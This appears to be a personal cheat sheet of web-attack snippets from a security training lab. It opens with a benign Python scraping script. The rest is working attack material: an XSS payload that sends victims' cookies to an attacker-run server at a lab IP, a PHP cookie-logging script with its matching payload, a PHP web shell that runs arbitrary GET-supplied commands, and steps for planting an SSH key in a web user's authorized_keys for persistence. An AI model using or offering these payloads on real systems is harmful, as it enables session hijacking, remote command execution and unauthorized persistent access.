Scraping Data, html
  #!/usr/bin/python
  ### Imports ###
  import lxml.html
  import requests
   
  ### Grabs the webpage ###
  page = requests.get('http://quotes.toscrape.com')
  tree = lxml.html.fromstring(page.content)
   
  ### Outlines the tag you want to grab ###
  # Change //small[...[ to whatever tag. Leave /text() as is
  results = tree.xpath('//small[@class="author"]/text()')
  
  ### Prints it out ###
  print ('Results: ',results)
  

COOKIE STEALING!
 run on opstation: 
  python3 -m http.server using   <script>document.location="http://10.50.38.82:8000/"+document.cookie;</script>

-----OR-----
<?php
$cookie = $_GET["username"]
$steal = fopen("/var/www/html/uploads/cookiefile.txt", "a+");
fwrite($steal, $cookie ."\n");
fclose($steal);
?>
(Cookie_Stealer.php)

using      <script>document.location="http://serveripport/uploads/cookie_stealer.php?username="+document.cookie;</script>



Web Shell:
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<?php
if($_GET['cmd']) {
  system($_GET['cmd']);
  }
?>
</pre>
</BODY></HTML>


SSH KEYGEN
ssh-keygen -t rsa -b 4096 ( on lin-ops) in .ssh

copy to user(whoami) home page /../.ssh
echo "key" >> /../.ssh/authorized_keys  (/var/www/.ssh)
cat to verify

### verify locations and folders/files!!!
 ls -la /users/home/directory      #check if .ssh exists
 mkdir /users/home/directory/.ssh  (/var/www/.ssh)
 








